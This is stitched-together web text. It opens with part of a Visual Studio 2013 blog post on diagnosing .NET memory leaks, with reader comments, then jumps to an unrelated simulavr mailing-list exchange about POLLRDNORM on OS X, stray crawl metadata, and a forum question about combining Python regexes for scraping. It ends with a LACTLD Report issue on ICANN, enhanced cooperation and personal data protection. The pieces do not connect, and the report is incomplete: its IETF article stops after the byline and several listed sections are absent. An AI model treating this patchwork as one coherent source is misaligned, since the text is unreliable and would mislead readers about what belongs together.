First I want to see if I can make page loading more memory efficient, so I'll start looking at the objects that are using the most memory in the type summary (top pane) of the memory analysis window. Here I see that Byte[] is the type that is using the most memory, so I'll expand the System.Byte[] line to see the 10 largest Byte[]'s in memory. I see that this and all of the largest Byte[]'s are ~1 MB each, which seems large, so I want to determine what is using these large Byte[]'s. Clicking on the first instance shows me this is being referenced by a SampleLeak.Models.User object (as are all of the largest Byte[]'s if I work my way down the list). At this point I need to go to my application's source code to see what User is using the Byte[] for. Navigating to the definition of User in the sample project, I can see that I have a BinaryData member that is of type byte[]. It turns out that when I'm retrieving my user from the database I'm populating this field, even though I am not using this data as part of the page load logic.
public class User : IUser
{
    // …
    [Key]
    public string Id { get; set; }
    public string UserName { get; set; }
    public byte[] BinaryData { get; set; }
}

This field is populated by the query:

User user = MockDatabase.SelectOrCreateUser(
    "select * from Users where Id = @p1", userID);

In order to fix this, I need to modify my query to only retrieve the Id and UserName when I'm loading a page; I'll retrieve the binary data later, only if and when I need it.

User user = MockDatabase.SelectOrCreateUser(
    "select Id, UserName from Users where Id = @p1", userID);

Finding the memory leak

The second problem I want to investigate is the continual growth of the memory that is indicating a leak. The ability to see what has changed over time is a very powerful way to find leaks, so I am going to compare the current dump to the first one I took. To do this, I expand the "Select Baseline" dropdown and choose "Browse…" This allows me to select "iisexpress1.dmp" as my baseline. Once the baseline finishes analyzing, I have an additional two columns, "Count Diff" and "Total Size Diff", that show me the change between the baseline and the current dump. Since I see a lot of system objects I don't control in the list, I'll use the Search box to find all objects in my application's top-level namespace "SampleLeak". After I search, I see that SampleLeak.Models.User has increased the most in both size and count (there are an additional 10 objects compared to the baseline). This is a good indication that User may be leaking. The next thing to do is determine why User objects are not being collected. To do this, I select the SampleLeak.Models.User row in the top table. This will then show me the reference graph for all User objects in the bottom pane. Here I can see that SampleLeak.Models.User[] has added an additional 10 references to User objects (notice the reference count diff matches the count diff of User).
Since I don't remember explicitly creating a User[] in my code, I'll expand the reference graph back to the root to figure out what is referencing the User[]. Once I've finished expansion, I can see that the User[] is part of a List<User> which is directly referenced by the static variable SampleLeak.Data.UserRepository.m_userCache (static variables are GC roots).

Next I'll go to the UserRepository class I added to the application.

public static class UserRepository
{
    // Store a local copy of recent users in memory to prevent extra database queries
    static private List<User> m_userCache = new List<User>();

    public static List<User> UserCache
    {
        get { return m_userCache; }
    }

    public static User GetUser(string userID)
    {
        // Retrieve the user's database record
        User user = MockDatabase.SelectOrCreateUser(
            "select Id, UserName from Users where Id = @p1", userID);

        // Add the user to the cache before returning
        m_userCache.Add(user);
        return user;
    }
}

Note: at this point, determining the right fix usually requires an understanding of how the application works. In the case of my sample application, when a user loads the Home page, the page's controller queries the UserRepository for the user's database record. If the user does not have an existing record, a new one is created and returned to the controller. In my UserRepository I have created a static List<User> I'm using as a cache to keep local copies so I don't always need to query the database. However, statics are automatically rooted, which is why the List<User> shows as directly referenced by a root rather than by UserRepository. Coming back to the investigation, a review of the logic in my GetUser() method reveals that the problem is that I'm not checking the cache before querying the database, so on every page load I'm creating a new User object and adding it to the cache. To fix this problem I need to check the cache before querying the database.
public static User GetUser(string userID)
{
    // Check to see if the user is in the local cache
    var cachedUser = from user in m_userCache
                     where user.Id == userID
                     select user;
    if (cachedUser.Count() > 0)
    {
        return cachedUser.FirstOrDefault();
    }
    else
    {
        // User is not in the local cache; retrieve the user from the database
        User user = MockDatabase.SelectOrCreateUser(
            "select * from Users where Id = @p1", userID);

        // Add the user to the cache before returning
        m_userCache.Add(user);
        return user;
    }
}

Validating the fix

Once I make these changes I want to verify that I have correctly fixed the problem. In order to do this, I'll launch the modified application again, and after 20 page refreshes Performance Monitor shows me only a minimal increase in memory (some variation is to be expected as garbage builds up until it is collected). Just to definitively validate the fixes, I'll capture one more dump, and a look at it shows me that Byte[] is no longer the object type taking up the most memory. When I do expand Byte[], I can see that the largest instance is much smaller than the previous 1 MB instances, and it is not being referenced by User. Searching for User shows me one instance in memory rather than 20, so I am confident I have fixed both of these issues.

In Closing

We walked through a simple example that showed how to use Visual Studio 2013 to diagnose memory problems using dump files with heap. While the example was simple, hopefully you can see how this can be applied to memory problems you have with your applications in production. So if you find yourself in a scenario where you need to be using less memory, or you suspect there is a memory leak, give Visual Studio 2013 Ultimate a try. Feel free to download the sample project used in this blog post and try it for yourself. It is recommended that you continue by reading part 2 of this post covering additional features. If you have any comments/questions I'd love to hear them in the comments below or in our MSDN forum.
Using the example in this post

If you would like to try the sample I showed in this post, do the following:

- Download the attached SampleLeakFiles.zip file and extract the contents
- In Visual Studio 2013, create a new C# ASP.NET MVC project and name it "SampleLeak" (make sure to use the new Visual Studio 2013 One ASP.NET template)
- Replace the contents of the generated "Controllers\HomeController.cs" with the copy from the .zip
- Add the "User.cs" included in this .zip to the "Models" folder
- Add the included UserRepository.cs and MockDatabase.cs to the project

Your SampleLeak MVC app will now match the app I used to create this blog post.

Hi, doesn't the first CTP release only come on the 26 June? We can't use the sample code yet to debug the memory issues in 2013 as the readme file suggests =(.

@Gordon The sample code attached will work to create the project in Visual Studio 2012 as well as Visual Studio 2013, but yes, you will have to wait till the preview is available next week to try the new memory feature in 2013.

This looks like a great feature, and this was a great post. I've done investigations in the past using WinDbg, examining the objects on the heap, writing down values of largest size and largest numbers of objects on a heap. This tooling appears to really assist what I had to do in WinDbg to get to a memory leak. I like your example of finding a leak related to objects held in a List<> collection. I encountered a similar problem in a WPF application, where ViewModels were getting swapped around as a user navigated to different parts of the app, and the ViewModel wasn't clearing its internal collections. Look forward to getting the Visual Studio 2013 preview next week and exploring this feature more.

Why worry about memory problems? Because the LOH still (we're > 12 yrs in now) does not compress used space.

Great article! Looking forward to VS 2013!
PLEASE also give us tools that handle .NET and WinRT classes working together and falling over each other and causing memory leaks. The GC vs ref-counting differences cause a boatload of gotchas that are near-impossible to find today. The only option is really trial and error. Please pretty PLEASE.

Awesome, thanks!

Will you fix the GUI in VS 2013?

@Morten, thanks for the feedback. Unfortunately this tool won't specifically help you with this scenario (although it will show you your references to WinRT classes). This is a scenario we will be looking into providing better tooling for in the future. If you would like to discuss the specific scenarios you are struggling with, please feel free to contact me at andrehal@microsoft.com

@ThomasX, is there specific UI you are referring to in Visual Studio?

"@ThomasX, is there specific UI you are referring to in Visual Studio?" Are you seriously asking this? WE TELL YOU A VERY LONG TIME, THAT WE WANT THE COLORED ICONS FROM VS2010 BACK. The ugly icons make it nearly impossible to use VS2012 without getting a headache after a few minutes! IS THIS SO HARD TO UNDERSTAND?

@Andre, thank you for the frank feedback. In regards to color, have you seen the blue theme that was added to Visual Studio 2012 in Update #2? The blue theme looks very similar to Visual Studio 2010, and has been further enhanced in Visual Studio 2013 (the screenshots above were taken in the blue theme). If you would like to see specific improvements to the blue theme or the colors in Visual Studio, we continue to leverage community feedback, so please either file a connect bug using Microsoft Connect (connect.microsoft.com/VisualStudio), provide feedback on the Visual Studio User Voice site (visualstudio.uservoice.com), or use the new Feedback icon in the top right of Visual Studio 2013 Preview, which will be the most effective channels for that feedback.
Greg, for LOH see this post: blogs.msdn.com/…/no-more-memory-fragmentation-on-the-large-object-heap.aspx

Does this work for 64-bit processes as well? I've done some dumps with ProcDump from our .NET service, but the "Debug Managed Memory" option is not visible when I load this dump. Wouldn't it be nice if you could create such dump files (with correct parameters) directly from VS? Remote processes (services) should also be supported. Is such a feature planned for the RTM or for any upcoming version?

@Toni_Wenzel "Wouldn't it be nice if you could create such dump files (with correct parameters) directly from VS?" You can 🙂 when you are debugging a process with Visual Studio, while in a break state you can use "Debug -> Save Dump As…" to save the dump file. It was subtly linked to in the post above, but see the following blog post for full details (it also covers procdump and Task Manager): blogs.msdn.com/…/what-is-a-dump-and-how-do-i-create-one.aspx

You might want to highlight the requirement of using the 4.5 Framework at the beginning of your article. I downloaded the preview just to try this feature but couldn't do so since our process runs on 4.0.

@Brian Thanks for the feedback, I updated the introduction above to call this out.

"If the dump was collected on an older version the option will be disabled with a tooltip explaining why." This is not the case, is it? It would be great to have though; it took me a while to figure out why this option is missing. I only skimmed over your post and didn't notice this (btw unfortunate) requirement.

@Floele Thanks for the comment, you are correct; my apologies for the mistake. I have corrected this in the post: if the process is 3.5 (or previous) the option does not appear; if it was 4.0 it will fail to launch with an error message.

Thanks for this great article. I'm trying it out, but get an error when trying to debug managed memory: Managed debugging is not available for this minidump.
the version of clr.dll in the target does not match the one mscordacwks.dll was built for. The target process is a 64-bit .NET 4.5 process on a Win7 machine with SP1. Any idea?

@Michiel To analyze managed code, the debugger needs the matching version of mscordacwks.dll for the target process; it can get this from the Microsoft Symbol Servers when the machine you are running on has a different version. To do this, enable "Microsoft Symbol Servers" in your symbol settings (Tools -> Options -> Debugging -> Symbols, check "Microsoft Symbol Servers" and specify a local cache); it will download the necessary mscordacwks from the symbol server and everything should work as expected.

The dump file summary screenshot shows that your analysis was done using the 4.0 CLR [1]. I really have a need to perform post-mortem analysis for a large 4.0 CLR problem. Rebuilding everything for 4.5 is not an option. What do I do? While we're at it, the problem in question is due to "un-rooted" objects, at least according to PSSCOR4. Clearly, 700MB of these in the LOH at generation 2 suggests otherwise. That is, there must be a mismatch between the tool's algorithm and the actual implementation of the GC when it comes to determining whether an object can be collected. This suggests that being rooted is only part of the determination. What does this feature do in this regard?

[1] blogs.msdn.com/…/8836.image_5F00_74AE0323.png
So since 4.5 guarantees backward compatibility, you could update the version running on the machine and your binaries will continue to run correctly, and this tool will work because it relies on capabilities that were introduced in 4.5 but not present in 4.0. It sounds like you are asking about data you are seeing in psscor4; unfortunately I can't say whether the data you are seeing is a bug or if a garbage collection just hasn't occurred yet to clean up those objects (objects can be in memory unrooted because they have not been collected yet). You can try cross-referencing the data by using PerfView (…/details.aspx).

Hi! I have an x64 memory dump of a w3wp process. When I open the VS2013 managed memory analysis view (without filters), it shows that there are 18 MB of String instances. And !dumpheap -stat in WinDbg shows 160 MB of String instances. Why so?

@Dronkoff WinDbg shows all managed objects in the heap, whether they are rooted or not (and thus eligible for garbage collection) [1]. Managed Memory Analysis in VS 2013 shows only those managed objects in the heap which are rooted (are roots themselves or have a path to a root), without having to explicitly force a GC prior to creating the minidump. The rationale is that unrooted objects will be released in the next GC for that generation and will not be the cause of your memory leak. This would explain why VS 2013 shows a smaller number/size of instances than WinDbg. To test this out, you can try forcing a GC in your code (GC.Collect(3) as mentioned in [1]) and take another memory dump; WinDbg and VS should now display the same stats. If you prefer, we (the Managed Memory Analysis crew) can take a look at the memory dump to verify that this is the case. Shoot us an email at vsdbgfb at microsoft dot com to get started.

[1] blogs.msdn.com/…/496973.aspx

Hi, I don't see the "Debug Managed Memory" option.
I've tried both the latest procdump and Debug -> Save Dump As… My project targets .NET 4 but is (obviously) running on a .NET 4.5.1 machine via VS2013. I even tried creating a new console app targeting 4.5.1, then captured a dump with procdump. I still don't see the "Debug Managed Memory" option. Same if I use VS to capture the dump. Any ideas what's wrong? VS2013 Update 2 Professional, if it matters. Thanks

@kent As called out at the beginning of the post, this feature is only available in the Ultimate edition of Visual Studio 2013, so you will not see the option in Professional.

It seems IntelliTrace can do the same as well? Not sure what the main difference is, or how to choose between the approaches for analyzing a memory issue?

@"seems it overlaps with IntelliTrace?" IntelliTrace does not capture memory information, so there should not be any overlap between the two. You may be thinking about the memory .diagsession files which are generated in Application Insights and Azure Websites (blogs.msdn.com/…/investigating-memory-leaks-in-azure-web-sites-with-visual-studio-2013.aspx)? If that's the case, the differences are that the memory .diagsession files are significantly smaller, but do not give you instance data (blogs.msdn.com/…/net-memory-analysis-object-inspection.aspx). Additionally, it may not always be feasible to collect a .diagsession file (e.g. if the process crashes with an out of memory exception), whereas you can save a dump at that point.

Hi, and many thanks for the useful post! A problem with VS2013 I am having is that there is no "Select Baseline" dropdown; everything else works as described. Is this something not available in the trial version of VS 2013 Ultimate? Thank you again!

Not included in Premium.. like always it just Su**ks !

@Ju, please check out the Visual Studio 2015 SKU changes. There is no longer a separate Premium and Ultimate; they've been consolidated into an Enterprise SKU at the previous price level of Premium.
https://blogs.msdn.microsoft.com/visualstudioalm/2013/06/20/using-visual-studio-2013-to-diagnose-net-memory-issues-in-production/
Hi Bill,

if a system did not define the constants we should not use them. I prefer to #ifdef the line where the additional constants are used. I can't believe that a system takes account of bits which are not defined. And defining the bits as a workaround is not the solution here. Simply leave them out of the call if the system does not have them. For that we could simply:

#ifdef POLLRDNORM
    ...
#endif

No additional OS testing needed. What do you think?

Bye
Klaus

> In that man page for poll I see the following text:
>
> ~ */
> ~ #endif
>
> My guess is that David doesn't have this. Klaus, would it be a bad
> idea for you to condition your use of POLLRDNORM on _XOPEN_SOURCE? I
> don't know the correct solution here... if you need that feature, then
> we need to find a solution. I also suspect that it is better for us to
> define our own #define for the use of this value, and let configure
> determine whether or not to use it. (for all I know, other systems
> also provide/use this value)
>
> Klaus Rudolph wrote:
> | Hi David,
> |
> | the problem is related to OS X. 'POLLRDNORM' is defined somewhere
> | in the system header files (<asm/poll.h> in linux) and it looks like
> | for OS X this is not correct. My problem is that I have no access
> | to any OS X machine. I googled a bit and found that in OS X the
> | constants should be defined in poll.h
> |
> | Could you please try: #include <poll.h> in front of the file
> | mysocket.cpp. If this does not work, could you please grep through
> | your system header files for the lost constants and add the missing
> | header to mysocket.cpp and try to compile again; maybe we will run
> | into some more "compatibility" problems.
> |
> | I hope we will be able to make the simulavrxx running on OS X. If
> | so, we (Bill :-)) will change the configure tests for OS X and we
> | could put that on the CVS.
> | If you are not familiar with searching for such things, you maybe
> | could give me or Bill access to your machine? If so please send me
> | a PM.
> |
> | Thank you for your help!
> |
> | Klaus

> _______________________________________________
> Simulavr-devel mailing list
> address@hidden
http://lists.gnu.org/archive/html/simulavr-devel/2004-10/msg00018.html
CC-MAIN-2015-11
refinedweb
427
82.65
This is a follow-up to my solved thread a few days ago about extracting parts of a RegEx search in a web-scraping app. Now I have a script that includes 4 RegEx searches that each work individually, and I want to combine all 4 into a single search that returns the 4 pieces of information in a single list. I've seen examples on the web using a plus sign "+" between the RegExes, but when I do that, I get an empty list returned (this is also the result if I use nothing between the searches). If I use "and" in place of "+", only the last search returns its value.

import re
import urllib

f = urllib.urlopen("")
tennis_rankings = f.read()

#++++++++++++++++++ The RegExes below all work individually.
#They extract, in order: 1) player's rank, 2) player's name, 3) player's total points, 4) number of tourneys played
#tennis_players = re.compile("<div class=\"entrylisttext\">([\d+]*)</div>", re.I | re.S | re.M)
#tennis_players = re.compile("playernumber=[A-Z][0-9]+\" id=\"blacklink\">([a-zA-Z]+, [a-zA-Z]+)", re.I | re.S | re.M)
#tennis_players = re.compile("pointsbreakdown.asp\?player=[A-Z][0-9]+&ss=y\" id=\"blacklink\">([0-9]+)", re.I | re.S | re.M)
#tennis_players = re.compile("playeractivity.asp\?player=[A-Z][0-9]+\" id=\"blacklink\">([0-9]+)", re.I | re.S | re.M)

#++++++++++++++++++ Now, together as a single search
tennis_players = re.compile("<div class=\"entrylisttext\">([\d+]*)</div>" +
                            "playernumber=[A-Z][0-9]+\" id=\"blacklink\">([a-zA-Z]+, [a-zA-Z]+)" +
                            "pointsbreakdown.asp\?player=[A-Z][0-9]+&ss=y\" id=\"blacklink\">([0-9]+)" +
                            "playeractivity.asp\?player=[A-Z][0-9]+\" id=\"blacklink\">([0-9]+)",
                            re.I | re.S | re.M)

find_result = tennis_players.findall(tennis_rankings)
print find_result
print 'done'

My preferred return is some sort of array of tuples:

[('1', 'Federer, Roger', '6600', '18'), ('2', 'Nadal, Rafael', '5800', '19'), ('3', 'Djokovic, Novak', '4900', '20'), ...]

Any help would be appreciated!
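A likely cause of the empty result: in the page source there is other HTML between the four fragments, and plain concatenation requires them to sit directly next to each other. Joining the patterns with non-greedy `.*?` gaps, together with re.S so the gaps can span newlines, makes the combined search work. The following sketch shows that fix; since the page URL is elided in the post above, the HTML sample here is invented to mimic the structure the patterns imply (the original `[\d+]*` group is also simplified to `\d*`, which is what it was meant to match).

```python
import re

# Invented stand-in for the rankings page: the four pieces of data appear
# in order, but with other markup between them.
sample = '''
<div class="entrylisttext">1</div>
<td><a href="playerprofile.asp?playernumber=F0001" id="blacklink">Federer, Roger</a></td>
<td><a href="pointsbreakdown.asp?player=F0001&ss=y" id="blacklink">6600</a></td>
<td><a href="playeractivity.asp?player=F0001" id="blacklink">18</a></td>
'''

# The four working patterns, joined with non-greedy .*? gaps so the HTML
# between them is skipped; re.S lets the gaps cross line breaks.
tennis_players = re.compile(
    r'<div class="entrylisttext">(\d*)</div>'
    r'.*?playernumber=[A-Z]\d+" id="blacklink">([a-zA-Z]+, [a-zA-Z]+)'
    r'.*?pointsbreakdown\.asp\?player=[A-Z]\d+&ss=y" id="blacklink">(\d+)'
    r'.*?playeractivity\.asp\?player=[A-Z]\d+" id="blacklink">(\d+)',
    re.I | re.S)

print(tennis_players.findall(sample))  # [('1', 'Federer, Roger', '6600', '18')]
```

Run against the full page, findall then returns one 4-tuple per ranked player, which is exactly the array of tuples asked for.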
https://www.daniweb.com/programming/software-development/threads/136562/newbie-concatenating-multiple-regex-s
CC-MAIN-2019-04
refinedweb
326
52.66
ISSN: 2301-1025
2nd year, 3rd edition

LACTLD Report
The Latin American and Caribbean ccTLD publication

ANOTHER YEAR OF GROWTH AND CHANGES
The Internet is constantly evolving. So are its challenges. The opportunities for development, participation and representation of stakeholders in the region encourage us to face 2014 with high expectations.

IETF, by two regional technical experts
Security: personal data protection in Latin America
Enhanced cooperation and Internet governance

EDITORIAL STAFF
LACTLD Report, 3rd edition, 2nd year, 2013
Board of Directors: Eduardo Santoyo, Luis Arancibia, Víctor Abboud, Clara Collado, Frederico Neves
Editorial Board: Eduardo Santoyo, Luis Arancibia, Clara Collado, Carolina Aguerre
General Coordination: Marilina Esquivel
Editorial assistant: Sofía Zerbino
Art & Design: Frida
Photography: Martín Mañana
Image banks: Images provided by the registries
Translation: Virginia Algorta

LACTLD Report is the ccTLD publication of the Latin American and Caribbean TLD Association (LACTLD). The published material does not compromise in any way LACTLD's responsibility. The opinions expressed belong solely to the authors and do not necessarily represent the Association's views. This is a work licensed under Creative Commons. Except when expressed otherwise, this work is under an Attribution Licence. In every use of the work authorized by this licence it will be necessary to acknowledge the authorship (compulsory in all cases).

Summary
3. Continued collaboration: LACTLD Report first anniversary. By Eduardo Santoyo
4. In Latin America and the Caribbean, ICANN continues to grow. By Alexandra Dans

Continued collaboration: LACTLD Report first anniversary

Dear Readers,

Another year ends, with plenty of debates, discussions and joint efforts to stimulate ccTLD growth, both within and outside the region of Latin America and the Caribbean.
In this letter I would like to thank you all for your hard work, and also to invite you to continue sharing the rewarding task of promoting registry cooperation and development during 2014.

The third issue of the LACTLD Report contains various articles and pieces of news. A relevant announcement is that the publication is now catalogued under the ISSN system, which will enable it to be indexed and referenced globally.

There is information about ICANN's new Engagement Center in Latin America and the Caribbean, which opened in Montevideo, Uruguay, and which aims to increase the representation of diverse stakeholders within the scope of that organization.

The subject of enhanced cooperation is addressed in an article that explains the present situation and the challenges faced in its implementation. The creation of a working group (WGEC) and the enriching discussions around this topic are also treated in these pages.

A very hot subject is the protection of personal data on the Internet, which is presented in a general way and also according to the laws of different countries of the region. As the commentator notes, the main problem of the regulatory system is its enforcement and implementation.

Furthermore, in two articles, experts from NIC.cl and LACNIC provide their views on the significance of the Internet Engineering Task Force (IETF) and its impact on the community, and they explain the relevance of the participation of representatives of the region.

The Report also contains an article on the role of the DNS Security Extensions in the approach to security problems, and on the inconveniences faced in this task, by one of the world experts in the field, Patrik Fältström from Netnod.

As is usual in this publication, we include an overview of the evolution of the registration of domain names. Latin America is close to nine million domain names and continues to grow at high rates in comparative terms with other regions.
And we also used these pages to congratulate NIC.br on its 25th anniversary.

I wish you a Happy New Year, and we will meet again in the fourth issue of our Report in May 2014.

Eduardo Santoyo
President, LACTLD

6. Enhancing stakeholder cooperation. By Carolina Aguerre
11. Personal data protection in Latin America. By Alberto Cerda Silva
14. Two regional views of the IETF. By Hugo Salgado and Carlos Martínez Cagnazzo
17. Domain names, evolution and trends. By LACTLD
20. The importance of DNSSEC. By Patrik Fältström
22. .br celebrates 25 years

Columns

In Latin America and the Caribbean, ICANN continues to grow

By Alexandra Dans
Communications Manager for Latin America and the Caribbean

The opening of the Engagement Center in Montevideo and the visit of the president of the corporation, Fadi Chehadé, as well as the holding of the 48th ICANN meeting in Buenos Aires, are developments that demonstrate the strength of the organization.

In recent months, several developments have mobilized us at ICANN. Among the main ones is the opening of our Engagement Center for Latin America and the Caribbean in July 2013. The inauguration took place in the context of our efforts to internationalize our operations. The purpose of this Center is to increase participation and improve our relationship with the different stakeholders of the Internet community, fulfilling the communication needs of our region.

The Engagement Center is located in Casa de Internet Latinoamérica y el Caribe (Latin America and the Caribbean Internet House), a unique initiative in the world. This privileged position allows synergies with sister organizations in the region such as the Latin America and Caribbean Network Information Centre (LACNIC), the Internet Society (ISOC) and LACTLD, among many others.

ICANN's team for the region of Latin America and the Caribbean is composed of Rodrigo de la Parra, Vice President for Latin America and the Caribbean, Albert Daniels, relationship manager for the Caribbean, and Alexandra Dans, Communications Manager for Latin America and the Caribbean.

We recommend watching the video of Casa de Internet, available in Spanish with subtitles in English and Portuguese. The Spanish version with English subtitles is available at watch?v=0-_XYyj67Pk and the Spanish version with Portuguese subtitles at watch?v=uhF314uU6Hc.

As of the opening of the Engagement Center for the region, we also opened two Twitter accounts to share the latest news in Spanish and Portuguese. We could not be oblivious to the fact that Latin America is the region where social media is most widely used. We invite you to follow us at @ICANN_es and @ICANN_pt. We also work with Scoop.it, a tool that allows us to share all press releases and news on ICANN, both in Spanish and Portuguese. News can be found at: and at scoop.it/t/noticias-em-portugues.

Furthermore, in October this year, our President and CEO, Fadi Chehadé, honored us with a visit to our Engagement Center at Casa de Internet and to the Uruguayan ccTLD. Officers visited the Central Computer Service (SeCIU) at Universidad de la República, the entity responsible for the Uruguayan ccTLD (.uy), which formalized its relationship with ICANN in 2009. Fadi said that the experience was extremely positive and that he really enjoyed taking part in this event.

Meetings held at Casa de Internet with leading organizations in charge of Internet governance resulted in a historic and extremely relevant document for the future of cooperation on the Internet, called the "Declaration of Montevideo". This document was also central to many discussions at the Internet Governance Forum held in Bali. You can read it here:
icann.org/es/news/press/releases/release-07oct13-es

Meeting in Buenos Aires

Other good news for this year, and something that really excites us, is the holding of our organization's 48th meeting in the iconic city of Buenos Aires from November 17 to 21. We met in this city 15 years ago to discuss the white paper that would lead to the creation of ICANN. We invite you to watch the video "Internet pioneers in the region of Latin America and the Caribbean" that we have prepared for this important occasion and which shall be released during the event. The link to the event website is http://buenosaires48.icann.org/es.

During the meeting, a tri-fold brochure in Spanish, Portuguese and English shall be distributed, intended as a guide for participants from our region to assist them in choosing the sessions that best suit their interests. You may check the rooms and times of the following sessions in the Latin America and the Caribbean Participants' Guide:

• Legal LACTLD Workshop (closed session).
• Opening Session (open session).
• Presentation of the Strategic Plan for the region (open session).
• A place for economic actors in Latin America and the Caribbean in ICANN meetings (open session).
• Let's talk about IPv6 in Latin America and the Caribbean (open session).
• Cocktail for local companies and businesses (RSVP).
• Breakfast for local companies and businesses (RSVP).
• Academia and ICANN in Latin America and the Caribbean (open session).
• Challenges to security and stability in the region (open session).
• Outstanding Achievement Award (open session).

We invite you to follow us on blog.icann.org, where we regularly publish notes related to our work in the region.

Strategic Plan for the region

Our organization found that there still is a low representation of certain groups of interest within ICANN.
Many of the actions of the strategic plan currently being implemented seek to alleviate this situation and encourage the participation of groups that do not currently take part in an active manner. Our Engagement Center works under that approach, for example by producing guidance material and content in the languages of our region.

Several projects are already underway. One of them is to strengthen our presence in the regional press and, as already mentioned, in social media in the languages of the region. A significant effort is being made for greater visibility in the region, for example through the promotion of new content on different topics of interest in Spanish (see, for example, the latest notes in Spanish on ICANN's blog, the latest press releases disseminated in Spanish and the promotional material to be distributed in Buenos Aires). Also, we shall very soon launch ICANN's website for Latin America and the Caribbean.

Finally, within the strategic plan, the purpose is also to support the holding of technical workshops, such as the one that LACTLD organized on September 3, 2013 in Panamá.

DOCUMENTS

Enhancing stakeholder cooperation

By Carolina Aguerre

With the new millennium, the place of the new technologies in governmental agendas became much more visible. … (ii) the principle of enhanced cooperation to promote mechanisms of participation and involvement of all actors, particularly governments (see text box with the articles).

According to Markus Kummer, Vice President for Global Policy of the Internet Society (ISOC), enhanced cooperation is "one of the code words in Internet governance discussions and means different things to different people. The term goes back to the second phase of the World Summit on the Information Society held in Tunis in 2005.
There is no common understanding of what is meant by the term, but it is used by some countries to push for setting up a new UN body to deal with Internet issues."[1]

[1] Source: blog/2012/07/internet-governance-what-enhancedcooperation

The critical issues of enhanced cooperation

"71. The process towards enhanced cooperation, to be started by the UN Secretary-General, …" (Tunis Agenda)

Since 2015 is fast approaching, a landmark year a decade after the Tunis Agenda in which evaluations of Internet governance will be performed, enhanced cooperation has become one of the most controversial issues due to the ambiguity of its definition, scope and operationalization.[2] The responses gathered addressed: (i) the level of implementation of the principles contained in the Tunis Agenda; (ii) public policy issues and the possible mechanisms; (iii) the role of the different stakeholders; (iv) the role of developing countries; and (v) the barriers to participation in enhanced cooperation. The following section develops the main points contained in each of these.

[2] To access the full document and the analysis of responses: SessionalDocuments/WGEC_Summary_of_Responses.pdf

Regarding the role of developing countries, the generalized assessment of most respondents is that there is an imperative need to incorporate more stakeholders from these countries, inasmuch as they represent the major volume of users of the Internet in the world, and the forthcoming billion. One initiative, proposed by IT for Change, an Indian NGO, envisages a body for Internet governance comprised of 150 governmental and non-governmental organizations of the technical community, and a board to supervise ICANN.

Regarding the role of the different stakeholders, the analysis of the different responses distinguishes two positions: some acknowledge a hierarchy between stakeholders, where governments should have a leading position; others, on the contrary, emphasize the equality of conditions for all. This is a key aspect for the future application of enhanced cooperation.

DOCUMENTS

Personal data protection in Latin America

By Alberto Cerda Silva
Assistant Professor of Computer Law, School of Law, University of Chile

We are experiencing many developments in the habeas data laws in the region. However, there is still room for improvement.

Since the late 1960s, the increasing use of technology in the processing of personal information has raised international concerns about the compatibility of such use with the preservation of human rights and of the conditions specific to a democratic society. This led, in the late 1970s, to the adoption of laws in the United States and Europe regulating the processing of such information. The issue remained unaddressed in Latin America, however, partly due to the still small role that technology played in the region, but also due to the existence of dictatorial and authoritarian governments with poor human rights commitments.

This situation would change over time. Between the 1980s and 1990s, Latin America made progress in its political re-democratization and increasing political openness. The democratization process revitalized the commitment to human rights, although it initially focused on more pressing matters than those resulting from the interaction with new technologies. At the same time, trade liberalization facilitated access to these technologies and improved the communications infrastructure in the region. At that time, Latin American countries adopted new constitutions which recognize the protection of the rights of individuals against the undue use of information.
However, the terse and sometimes ambiguous constitutional provisions did not guarantee adequate protection to people, nor did they provide security to those who process personal data. This regime would change at the beginning of the new century.

Changes in the new century

During the first decade of this century, Latin America tried to catch up with the developed countries in terms of providing protection to people regarding their personal information. To the above-mentioned constitutional protection, several countries added laws regulating in detail the rights and obligations associated with the processing of personal data. Such is the case of Chile (1999), Argentina (2000), Uruguay (2008), Mexico (2010), Costa Rica and Peru (2011), Colombia and Nicaragua (2012), and soon Brazil. Although with some nuances, there currently is in Latin America a constitutional and legal protection against the undue processing of personal information by both public and private entities.

Data protection laws generally guarantee that people control their personal information. Not only private but also public information. They have been rightly called habeas data laws, as the focus is not on the fact that the information is private but rather that it concerns identified or identifiable individuals. Thus, the law protects not only information on the health status or the political, religious or sexual choices of individuals, but also business information, credit reports, public records and even the Internet connection numbers they use.

The adoption of specific laws on the protection of personal data represents a huge achievement. From this standpoint, the law not only strengthens control over personal information, but it also enhances the exercise of individuals' fundamental rights.
From the perspective of those processing personal information, whether public or private entities, the law provides security regarding the use they can make of such data. From an international perspective, an appropriate personal data law also removes certain obstacles to the flow of information, obstacles which prevent countries in the region from offering services in those countries that require adequate protection.

Law enforcement

But a law on the protection of personal data is not enough. One of the fundamental problems in the region is to ensure its effective enforcement. The law is sometimes violated out of sheer ignorance. But, in other cases, it is more profitable to violate it than to comply with it. In cases of violation, the law must provide adequate compensation to the victims of data misuse, set the penalties applicable to those processing data improperly, and appoint an authority to oversee effective compliance with the law. Although the contribution of the courts is valuable, it is insufficient. Hence, most of the countries have established independent authorities to promote, educate, monitor and punish cases of violation of the law.

A second critical aspect of the rules of the different Latin American countries is the lack of legislative harmonization. That is, laws still vary considerably from one country to another, complicating the work of online service operators that provide transnational services and causing the minimum level of protection offered to people across the region to be somewhat uncertain. This requires Latin America to make progress in terms of regulatory convergence, so that there is a minimum common denominator regarding the protection that people can get throughout the region.

A third significant challenge to the regulation of the processing of personal data in Latin America relates to the technological environment. Although the laws are generally applicable, there still are doubts as to their application to telecommunication service operators, online service providers and Internet service providers, among others. This issue has become especially sensitive in view of the adoption by some countries of data retention laws that require Internet providers to collect and store user data for a certain period of time in order to use them for purposes of criminal prosecution. The indiscriminate and surreptitious use of personal data by some operators for commercial or marketing purposes, without the consent of the concerned individuals, is another pressing issue.

Vision of the future

Latin America has undoubtedly made progress as far as the protection of personal data across the region is concerned. This protection combines constitutional provisions and general laws on the subject. In the coming years, we should see how the lagging countries join this trend and, at the same time, how countries deal with the above-mentioned issues, effectively ensuring compliance, harmonizing rules and specifying the application of the law in certain contexts. In sum, although progress has been made, it is necessary to strengthen the protection of personal data in the region so that its use does not violate the rights of individuals or affect the democratic system.
DOCUMENTS

Two regional views of the IETF

Hugo Salgado, engineer at NIC Chile (.CL), and Carlos Martínez Cagnazzo, Research and Development engineer at LACNIC, share their thoughts about the Internet Engineering Task Force (IETF).

Key IETF documents

